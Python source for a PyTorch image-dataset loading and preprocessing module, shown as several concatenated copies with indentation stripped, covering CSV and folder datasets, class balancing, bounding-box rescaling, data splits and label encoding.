data_dfs[self.tr_name], temp_tfms)
self.img_mean, self.img_std = get_img_stats(temp_dataset,
stats_percentage)
data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][
-1].std = self.img_mean, self.img_std
data_transforms[self.val_name][-1].mean, data_transforms[self.val_name
][-1].std = self.img_mean, self.img_std
data_transforms[self.test_name][-1].mean, data_transforms[self.
test_name][-1].std = self.img_mean, self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj, minorities,
class_diffs, bal_tfms[x]) for x in [self.tr_name, self.
val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj) for x in [
self.tr_name, self.val_name, self.test_name]}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],
batch_size=bs, shuffle=True, num_workers=num_workers) for x in
[self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,
self.val_name, self.test_name]}
self.image_datasets, self.dataloaders, self.dataset_sizes = (
image_datasets, dataloaders, dataset_sizes)
return image_datasets, dataloaders, dataset_sizes
def imshow(self, inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self, inp, calculate=False):
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
def show_data(self, folder_name='train', size=(64, 64), bs=5):
self.get_data(size, bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0], batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(
torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
| from dai_imports import *
from obj_utils import *
import utils
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_=None, obj=False,
minorities=None, diffs=None, bal_tfms=None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
assert transforms_ is not None, print('Please pass some transforms.')
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,
num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s, tuple):
s = s[0]
row_scale = s / img.size[0]
col_scale = s / img.size[1]
y = rescale_bbox(y, row_scale, col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = y, y2
return x, y
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None, loader=
default_loader, minorities=None, diffs=None, bal_tfms=None,
tta_tfms=None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform, target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self, index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self
.transform)
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
def extract_data(dt):
x = []
y = []
for a, b in dt:
x.append(a)
y.append(b)
return x, y
def listdir_fullpath(d):
return [os.path.join(d, f) for f in os.listdir(d)]
def get_minorities(df, thresh=0.8):
c = df.iloc[:, 1].value_counts()
lc = list(c)
max_count = lc[0]
diffs = [(1 - x / max_count) for x in lc]
diffs = dict((k, v) for k, v in zip(c.keys(), diffs))
minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *
max_count]
return minorities, diffs
def csv_from_path(path, img_dest):
path = Path(path)
img_dest = Path(img_dest)
labels_paths = list(path.iterdir())
tr_images = []
tr_labels = []
for l in labels_paths:
if l.is_dir():
for i in list(l.iterdir()):
if i.suffix in IMG_EXTENSIONS:
name = i.name
label = l.name
new_name = '{}_{}'.format(path.name, name)
new_path = img_dest / new_name
os.rename(i, new_path)
tr_images.append(new_name)
tr_labels.append(label)
tr_img_label = {'Img': tr_images, 'Label': tr_labels}
csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])
csv = csv.sample(frac=1).reset_index(drop=True)
return csv
def add_extension(a, e):
a = [(x + e) for x in a]
return a
def one_hot(targets, multi=False):
if multi:
binerizer = MultiLabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
else:
binerizer = LabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
return dai_1hot, binerizer.classes_
def get_index(arr, a):
for i in range(len(arr)):
if sum(arr[i] == a) == len(a):
return i
return False
def rescale_bbox(bb, row_scale, col_scale):
bb = bb.reshape((-1, 4))
for b in bb:
r1, c1, r2, c2 = b
b[0] = int(np.round(r1 * col_scale))
b[1] = int(np.round(c1 * row_scale))
b[2] = int(np.round(r2 * col_scale))
b[3] = int(np.round(c2 * row_scale))
bb = bb.reshape((1, -1))
return bb
def get_img_stats(dataset, sz):
size = int(len(dataset) * sz)
i = 0
imgs = []
for img, _ in dataset:
if i > size:
break
imgs.append(img)
i += 1
imgs_ = torch.stack(imgs, dim=3)
imgs_ = imgs_.view(3, -1)
imgs_mean = imgs_.mean(dim=1)
imgs_std = imgs_.std(dim=1)
return imgs_mean, imgs_std
def split_df(train_df, test_size=0.15):
try:
train_df, val_df = train_test_split(train_df, test_size=test_size,
random_state=2, stratify=train_df.iloc[:, 1])
except:
train_df, val_df = train_test_split(train_df, test_size=test_size,
random_state=2)
train_df = train_df.reset_index(drop=True)
val_df = val_df.reset_index(drop=True)
return train_df, val_df
def save_obj(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(path):
with open(path, 'rb') as f:
return pickle.load(f)
class DataProcessor:
def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=
False, tr_name='train', val_name='val', test_name='test', extension
=None, setup_data=True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device('cuda:0' if torch.cuda.is_available() else
'cpu')
(self.data_path, self.train_csv, self.val_csv, self.reg, self.
tr_name, self.val_name, self.test_name, self.extension) = (
data_path, train_csv, val_csv, reg, tr_name, val_name,
test_name, extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self, split_size=0.15):
data_path, train_csv, val_csv, tr_name, val_name, test_name = (self
.data_path, self.train_csv, self.val_csv, self.tr_name, self.
val_name, self.test_name)
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path, tr_name)
val_path = os.path.join(data_path, val_name)
test_path = os.path.join(data_path, test_name)
if os.path.exists(os.path.join(data_path, tr_name + '.csv')):
train_csv = tr_name + '.csv'
if not train_csv:
print('no')
train_csv, val_csv, test_csv = self.data_from_paths_to_csv(
data_path, tr_path, val_path, test_path)
train_csv_path = os.path.join(data_path, train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:, 0])]
if self.extension:
img_names = add_extension(img_names, self.extension)
if val_csv:
val_csv_path = os.path.join(data_path, val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str, list(val_df.iloc[:, 1])))
if test_csv:
test_csv_path = os.path.join(data_path, test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str, list(test_df.iloc[:, 1])))
targets = list(map(str, list(train_df.iloc[:, 1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
int_targets = [list(map(float, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
obj_targets = list(map(str, list(train_df.iloc[:, 2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int, x)) for x in
obj_split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(obj_split_targets, True)
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in
obj_split_targets]
zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)
for i, t in enumerate(zero_idx):
t[len(t) - len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.
LongTensor) for z in zero_idx]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
self.data_dir, self.num_classes, self.class_names = data_path, max(
lengths), np.unique(zero_targets, axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int, x)) for x in split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(split_targets, self.
multi_label)
train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.
FloatTensor) for x in dai_onehot]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:, 1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:, 1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:, 1] = target_ids
self.data_dir, self.num_classes, self.class_names = data_path, len(
unique_targets), unique_targets
if not val_csv:
train_df, val_df = split_df(train_df, split_size)
if not test_csv:
val_df, test_df = split_df(val_df, split_size)
tr_images = [str(x) for x in list(train_df.iloc[:, 0])]
val_images = [str(x) for x in list(val_df.iloc[:, 0])]
test_images = [str(x) for x in list(test_df.iloc[:, 0])]
if self.extension:
tr_images = add_extension(tr_images, self.extension)
val_images = add_extension(val_images, self.extension)
test_images = add_extension(test_images, self.extension)
train_df.iloc[:, 0] = tr_images
val_df.iloc[:, 0] = val_images
test_df.iloc[:, 0] = test_images
train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)
val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)
test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)
self.minorities, self.class_diffs = None, None
if not self.obj or not self.multi_label:
self.minorities, self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,
self.test_name: test_df}
data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,
'num_classes': self.num_classes, 'class_names': self.
class_names, 'minorities': self.minorities, 'class_diffs': self
.class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}
self.data_dict = data_dict
return data_dict
def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,
test_path=None):
train_df = csv_from_path(tr_path, tr_path)
train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),
index=False)
ret = self.tr_name + '.csv', None
if val_path is not None:
val_exists = os.path.exists(val_path)
if val_exists:
val_df = csv_from_path(val_path, tr_path)
val_df.to_csv(os.path.join(data_path, self.val_name +
'.csv'), index=False)
ret = self.tr_name + '.csv', self.val_name + '.csv'
if test_path is not None:
test_exists = os.path.exists(test_path)
if test_exists:
test_df = csv_from_path(test_path, tr_path)
test_df.to_csv(os.path.join(data_path, self.test_name +
'.csv'), index=False)
ret = (self.tr_name + '.csv', self.val_name + '.csv', self.
test_name + '.csv')
return ret
def get_data(self, data_dict=None, s=(224, 224), dataset=
my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=
None, tta=False, num_workers=4, stats_percentage=0.6):
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (
data_dict['data_dfs'], data_dict['data_dir'], data_dict[
'minorities'], data_dict['class_diffs'], data_dict['obj'],
data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose([transforms.
FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack
([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops: torch.stack([transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(
crop) for crop in crops]))]), self.val_name: transforms.
Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda
crops: torch.stack([transforms.ToTensor()(crop) for crop in
crops])), transforms.Lambda(lambda crops: torch.stack([
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])(crop) for crop in crops]))]), self.test_name:
transforms.Compose([transforms.FiveCrop(s[0]), transforms.
Lambda(lambda crops: torch.stack([transforms.ToTensor()(
crop) for crop in crops])), transforms.Lambda(lambda crops:
torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])(crop) for crop in crops]))])}
else:
tta_tfms = None
if not bal_tfms:
bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None, self.test_name: None}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.
test_name: None}
if obj:
resize_transform = transforms.Resize(s)
else:
resize_transform = transforms.Resize(s)
if not tfms:
tfms = [resize_transform, transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]
else:
tfms_temp = [resize_transform, transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])]
tfms_temp[1:1] = tfms
tfms = tfms_temp
print(tfms)
data_transforms = {self.tr_name: tfms, self.val_name: [transforms.
Resize(s), transforms.ToTensor(), transforms.Normalize([0.485,
0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [
transforms.Resize(s), transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}
temp_tfms = [resize_transform, transforms.ToTensor()]
temp_dataset = dataset(os.path.join(data_dir, self.tr_name),
data_dfs[self.tr_name], temp_tfms)
self.img_mean, self.img_std = get_img_stats(temp_dataset,
stats_percentage)
data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][
-1].std = self.img_mean, self.img_std
data_transforms[self.val_name][-1].mean, data_transforms[self.val_name
][-1].std = self.img_mean, self.img_std
data_transforms[self.test_name][-1].mean, data_transforms[self.
test_name][-1].std = self.img_mean, self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj, minorities,
class_diffs, bal_tfms[x]) for x in [self.tr_name, self.
val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj) for x in [
self.tr_name, self.val_name, self.test_name]}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],
batch_size=bs, shuffle=True, num_workers=num_workers) for x in
[self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,
self.val_name, self.test_name]}
self.image_datasets, self.dataloaders, self.dataset_sizes = (
image_datasets, dataloaders, dataset_sizes)
return image_datasets, dataloaders, dataset_sizes
def imshow(self, inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self, inp, calculate=False):
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
def show_data(self, folder_name='train', size=(64, 64), bs=5):
self.get_data(size, bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0], batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(
torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
| from dai_imports import*
from obj_utils import*
import utils
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_ = None, obj = False,
minorities = None, diffs = None, bal_tfms = None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
assert transforms_ is not None, print('Please pass some transforms.')
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path = os.path.join(self.data_dir,self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms,'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
# print(self.tfms)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s,tuple):
s = s[0]
row_scale = s/img.size[0]
col_scale = s/img.size[1]
y = rescale_bbox(y,row_scale,col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = (y,y2)
return (x,y)
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None,
loader=default_loader, minorities=None, diffs = None, bal_tfms=None, tta_tfms = None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform,
target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self,index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms,'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self.transform )
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
def extract_data(dt):
x = []
y = []
for a,b in dt:
x.append(a)
y.append(b)
return x,y
def listdir_fullpath(d):
return [os.path.join(d, f) for f in os.listdir(d)]
def get_minorities(df,thresh=0.8):
c = df.iloc[:,1].value_counts()
lc = list(c)
max_count = lc[0]
diffs = [1-(x/max_count) for x in lc]
diffs = dict((k,v) for k,v in zip(c.keys(),diffs))
minorities = [c.keys()[x] for x,y in enumerate(lc) if y < (thresh*max_count)]
return minorities,diffs
def csv_from_path(path, img_dest):
path = Path(path)
img_dest = Path(img_dest)
labels_paths = list(path.iterdir())
tr_images = []
tr_labels = []
for l in labels_paths:
if l.is_dir():
for i in list(l.iterdir()):
if i.suffix in IMG_EXTENSIONS:
name = i.name
label = l.name
new_name = '{}_{}'.format(path.name,name)
new_path = img_dest/new_name
# print(new_path)
os.rename(i,new_path)
tr_images.append(new_name)
tr_labels.append(label)
# os.rmdir(l)
tr_img_label = {'Img':tr_images, 'Label': tr_labels}
csv = pd.DataFrame(tr_img_label,columns=['Img','Label'])
csv = csv.sample(frac=1).reset_index(drop=True)
return csv
def add_extension(a,e):
a = [x+e for x in a]
return a
def one_hot(targets, multi = False):
if multi:
binerizer = MultiLabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
else:
binerizer = LabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
return dai_1hot,binerizer.classes_
def get_index(arr,a):
for i in range(len(arr)):
if sum(arr[i] == a) == len(a):
return i
return False
def rescale_bbox(bb,row_scale,col_scale):
bb = bb.reshape((-1,4))
for b in bb:
r1,c1,r2,c2 = b
b[0] = int(np.round(r1*col_scale))
b[1] = int(np.round(c1*row_scale))
b[2] = int(np.round(r2*col_scale))
b[3] = int(np.round(c2*row_scale))
# bb = torch.tensor([bb_hw(b) for b in bb.reshape(-1,4)])
# for b in bb:
# r1,c1,r2,c2 = b
# b[0] = int(np.round(r1*row_scale))
# b[1] = int(np.round(c1*col_scale))
# b[2] = int(np.round(r2*row_scale))
# b[3] = int(np.round(c2*col_scale))
# if(sum(b)) == 1:
# b[0],b[1],b[2],b[3] = 0,0,0,0
bb = bb.reshape((1,-1))
return bb
def get_img_stats(dataset,sz):
size = int(len(dataset)*sz)
i = 0
imgs = []
for img,_ in dataset:
# print(img.size())
if i > size:
break
imgs.append(img)
i+=1
imgs_ = torch.stack(imgs,dim=3)
imgs_ = imgs_.view(3,-1)
imgs_mean = imgs_.mean(dim=1)
imgs_std = imgs_.std(dim=1)
return imgs_mean,imgs_std
def split_df(train_df,test_size = 0.15):
try:
train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2,stratify = train_df.iloc[:,1])
except:
train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2)
train_df = train_df.reset_index(drop = True)
val_df = val_df.reset_index(drop = True)
return train_df,val_df
def save_obj(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(path):
with open(path, 'rb') as f:
return pickle.load(f)
class DataProcessor:
def __init__(self, data_path = None, train_csv = None, val_csv = None, reg = False,
tr_name = 'train', val_name = 'val', test_name = 'test', extension = None, setup_data = True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
self.data_path,self.train_csv,self.val_csv,self.reg,self.tr_name,self.val_name,self.test_name,self.extension = (data_path,train_csv,
val_csv,reg,tr_name,val_name,test_name,extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self,split_size = 0.15):
data_path,train_csv,val_csv,tr_name,val_name,test_name = (self.data_path,self.train_csv,self.val_csv,self.tr_name,self.val_name,self.test_name)
# check if paths given and also set paths
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path,tr_name)
val_path = os.path.join(data_path,val_name)
test_path = os.path.join(data_path,test_name)
if os.path.exists(os.path.join(data_path,tr_name+'.csv')):
train_csv = tr_name+'.csv'
# if os.path.exists(os.path.join(data_path,val_name+'.csv')):
# val_csv = val_name+'.csv'
# if os.path.exists(os.path.join(data_path,test_name+'.csv')):
# test_csv = test_name+'.csv'
# paths to csv
if not train_csv:
print('no')
train_csv,val_csv,test_csv = self.data_from_paths_to_csv(data_path,tr_path,val_path,test_path)
train_csv_path = os.path.join(data_path,train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:,0])]
if self.extension:
img_names = add_extension(img_names,self.extension)
if val_csv:
val_csv_path = os.path.join(data_path,val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str,list(val_df.iloc[:,1])))
if test_csv:
test_csv_path = os.path.join(data_path,test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str,list(test_df.iloc[:,1])))
targets = list(map(str,list(train_df.iloc[:,1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
# bounding boxes
int_targets = [list(map(float,x)) for x in split_targets]
zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)
for i,t in enumerate(zero_targets):
t[len(t)-len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]
# one-hot classes
obj_targets = list(map(str,list(train_df.iloc[:,2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int,x)) for x in obj_split_targets]
except:
pass
dai_onehot,onehot_classes = one_hot(obj_split_targets,True)
# train_df['one_hot'] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]
# class indexes
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in obj_split_targets]
zero_idx = np.zeros((len(targets),max(lengths)//4),dtype=int)
# print(zero_idx.shape)
for i,t in enumerate(zero_idx):
# temp_l = len(class_idx[i])
# if temp_l > 90:
# print(i,temp_l)
t[len(t)-len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:,2] = [torch.from_numpy(z).type(torch.LongTensor) for z in zero_idx]
self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes
# self.set_up_object_detection([4,2,1],[0.7, 1., 1.3],[(1.,1.), (1.,0.5), (0.5,1.)])
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int,x)) for x in split_targets]
zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)
for i,t in enumerate(zero_targets):
t[len(t)-len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]
self.data_dir,self.num_classes,self.class_names = data_path, max(lengths),np.unique(zero_targets,axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int,x)) for x in split_targets]
except:
pass
dai_onehot,onehot_classes = one_hot(split_targets,self.multi_label)
train_df.iloc[:,1] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]
self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:,1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:,1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:,1] = target_ids
self.data_dir,self.num_classes,self.class_names = data_path,len(unique_targets),unique_targets
# self.models_path = os.path.join(self.data_dir, 'models')
# os.makedirs(self.models_path,exist_ok=True)
if not val_csv:
train_df,val_df = split_df(train_df,split_size)
if not test_csv:
val_df,test_df = split_df(val_df,split_size)
tr_images = [str(x) for x in list(train_df.iloc[:,0])]
val_images = [str(x) for x in list(val_df.iloc[:,0])]
test_images = [str(x) for x in list(test_df.iloc[:,0])]
if self.extension:
tr_images = add_extension(tr_images,self.extension)
val_images = add_extension(val_images,self.extension)
test_images = add_extension(test_images,self.extension)
train_df.iloc[:,0] = tr_images
val_df.iloc[:,0] = val_images
test_df.iloc[:,0] = test_images
train_df.to_csv(os.path.join(data_path,'train.csv'),index=False)
val_df.to_csv(os.path.join(data_path,'val.csv'),index=False)
test_df.to_csv(os.path.join(data_path,'test.csv'),index=False)
self.minorities,self.class_diffs = None,None
if (not self.obj) or (not self.multi_label):
self.minorities,self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name:train_df, self.val_name:val_df, self.test_name:test_df}
data_dict = {'data_dfs':self.data_dfs,'data_dir':self.data_dir,'num_classes':self.num_classes,'class_names':self.class_names,
'minorities':self.minorities,'class_diffs':self.class_diffs,'obj':self.obj,'multi_label':self.multi_label}
# save_obj(data_dict,os.path.join(self.data_dir,'data_dict.pkl'))
self.data_dict = data_dict
return data_dict
def data_from_paths_to_csv(self,data_path,tr_path,val_path = None,test_path = None):
train_df = csv_from_path(tr_path,tr_path)
train_df.to_csv(os.path.join(data_path,self.tr_name+'.csv'),index=False)
ret = (self.tr_name+'.csv',None)
if val_path is not None:
val_exists = os.path.exists(val_path)
if val_exists:
val_df = csv_from_path(val_path,tr_path)
val_df.to_csv(os.path.join(data_path,self.val_name+'.csv'),index=False)
ret = (self.tr_name+'.csv',self.val_name+'.csv')
if test_path is not None:
